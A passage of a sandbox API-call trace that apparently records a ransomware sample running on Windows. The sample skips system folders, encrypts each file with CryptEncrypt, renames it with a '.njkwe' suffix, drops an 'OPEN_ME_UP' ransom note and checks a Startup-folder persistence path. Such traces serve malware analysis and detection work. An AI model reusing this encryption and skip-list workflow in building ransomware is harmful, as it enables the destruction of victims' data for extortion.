ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.451] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.451] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.451] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.451] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.451] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.451] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\..") returned 33 [0061.451] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.451] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.451] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.451] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.451] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.451] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.451] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.451] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.451] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 39 [0061.451] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.451] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.451] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.451] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.451] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.452] GetTickCount () returned 0x114fca1 [0061.452] GetTickCount () returned 0x114fca1 [0061.452] GetTickCount () returned 0x114fca1 [0061.452] GetTickCount () returned 0x114fca1 [0061.452] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.452] GetProcessHeap () returned 0xbe0000 [0061.452] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.452] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xdda, lpOverlapped=0x0) returned 1 [0061.454] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff226, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.455] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xdda, lpOverlapped=0x0) returned 1 [0061.455] GetProcessHeap () returned 0xbe0000 [0061.455] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.455] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.455] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.455] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.455] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.455] CloseHandle (hObject=0x42c) returned 1 [0061.456] GetProcessHeap () returned 0xbe0000 [0061.456] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.456] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf_r00t_{3sXlE5}.njkwe") returned 59 [0061.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf_r00t_{3sxle5}.njkwe")) returned 1 [0061.459] GetProcessHeap () returned 0xbe0000 [0061.459] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.459] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.459] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0061.459] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0061.459] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0061.459] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0061.459] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0061.459] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 48 [0061.459] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".njkwe") returned 0x0 [0061.459] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.459] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0061.459] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.459] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.460] GetTickCount () returned 0x114fcb1 [0061.460] GetTickCount () returned 0x114fcb1 [0061.460] GetTickCount () returned 0x114fcb1 [0061.460] GetTickCount () returned 0x114fcb1 [0061.460] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.460] GetProcessHeap () returned 0xbe0000 [0061.460] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.460] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.463] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.463] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.463] GetProcessHeap () returned 0xbe0000 [0061.463] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.463] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.463] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.464] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.464] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.464] CloseHandle (hObject=0x42c) returned 1 [0061.466] GetProcessHeap () returned 0xbe0000 [0061.466] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.466] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml_r00t_{3sXlE5}.njkwe") returned 68 [0061.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml_r00t_{3sxle5}.njkwe")) returned 1 [0061.466] GetProcessHeap () returned 0xbe0000 [0061.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.466] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.466] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0061.466] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0061.467] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0061.467] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0061.467] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0061.467] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 49 [0061.467] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".njkwe") returned 0x0 [0061.467] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.467] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0061.467] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.467] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.470] GetTickCount () returned 0x114fcb1 [0061.470] GetTickCount () returned 0x114fcb1 [0061.470] GetTickCount () returned 0x114fcb1 [0061.470] GetTickCount () returned 0x114fcb1 [0061.470] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.470] GetProcessHeap () returned 0xbe0000 [0061.470] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.470] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.474] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.474] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0061.474] GetProcessHeap () returned 0xbe0000 [0061.474] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.474] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.474] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.474] WriteFile (in: hFile=0x42c, lpBuffer=0x380f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x380f730*, lpNumberOfBytesWritten=0x380f7e4*=0x80, lpOverlapped=0x0) returned 1 [0061.474] WriteFile (in: hFile=0x42c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f7e4*=0x4, lpOverlapped=0x0) returned 1 [0061.474] CloseHandle (hObject=0x42c) returned 1 [0061.475] GetProcessHeap () returned 0xbe0000 [0061.475] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0061.475] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll_r00t_{3sXlE5}.njkwe") returned 69 [0061.475] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll_r00t_{3sXlE5}.njkwe" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll_r00t_{3sxle5}.njkwe")) returned 1 [0061.476] GetProcessHeap () returned 0xbe0000 [0061.476] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0061.476] FindNextFileW (in: hFindFile=0xc19ea0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0061.476] FindClose (in: hFindFile=0xc19ea0 | out: hFindFile=0xc19ea0) returned 1 [0061.476] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0061.476] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1043\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.479] WriteFile (in: hFile=0x428, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f7ec*=0x351, lpOverlapped=0x0) returned 1 [0061.480] CloseHandle (hObject=0x428) returned 1 [0061.481] GetProcessHeap () returned 0xbe0000 [0061.481] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0061.481] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1044", cAlternateFileName="")) returned 1 [0061.481] lstrcmpiW (lpString1="1044", lpString2="Windows") returned -1 [0061.481] lstrcmpiW (lpString1="1044", lpString2="$Recycle.bin") returned 1 [0061.481] lstrcmpiW (lpString1="1044", lpString2="System Volume Information") returned -1 [0061.481] lstrcmpiW (lpString1="1044", lpString2="Program Files") returned -1 [0061.481] lstrcmpiW (lpString1="1044", lpString2="Program Files (x86)") returned -1 [0061.481] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044") returned 30 [0061.481] lstrcmpW (lpString1="1044", lpString2=".") returned 1 [0061.481] lstrcmpW (lpString1="1044", lpString2="..") returned 1 [0061.481] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1044", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0061.481] GetProcessHeap () returned 0xbe0000 [0061.481] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0061.481] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\*") returned 32 [0061.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\*", lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a260 [0061.484] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0061.484] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0061.484] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0061.485] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0061.485] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0061.485] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\.") returned 32 [0061.485] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0061.485] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0061.485] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0061.485] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0061.485] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0061.485] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0061.485] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0061.485] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\..") returned 33 [0061.485] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0061.485] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0061.485] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xbe6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.485] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0061.485] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0061.485] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0061.485] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0061.485] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0061.485] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf") returned 39 [0061.485] StrStrIW (lpFirst="eula.rtf", lpSrch=".njkwe") returned 0x0 [0061.485] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0061.485] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0061.485] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0061.485] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1044\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1044\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0061.485] GetTickCount () returned 0x114fcc0 [0061.485] GetTickCount () returned 0x114fcc0 [0061.485] GetTickCount () returned 0x114fcc0 [0061.485] GetTickCount () returned 0x114fcc0 [0061.485] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f730*, pdwDataLen=0x380f7e0*=0x80) returned 1 [0061.486] GetProcessHeap () returned 0xbe0000 [0061.486] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc43ec0 [0061.486] ReadFile (in: hFile=0x42c, lpBuffer=0xc43ec0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesRead=0x380f7e4*=0xbe6, lpOverlapped=0x0) returned 1 [0061.490] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0xfffff41a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0061.490] WriteFile (in: hFile=0x42c, lpBuffer=0xc43ec0*, nNumberOfBytesToWrite=0xbe6, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc43ec0*, lpNumberOfBytesWritten=0x380f7e4*=0xbe6, lpOverlapped=0x0) returned 1 [0061.490] GetProcessHeap () returned 0xbe0000 [0061.490] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc43ec0 | out: hHeap=0xbe0000) returned 1 [0061.490] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.491] WriteFile (in: hFile=0x42c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f7e4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f7e4*=0x300, lpOverlapped=0x0) returned 1 [0061.491] WriteFile (in: hFile=0x42c, 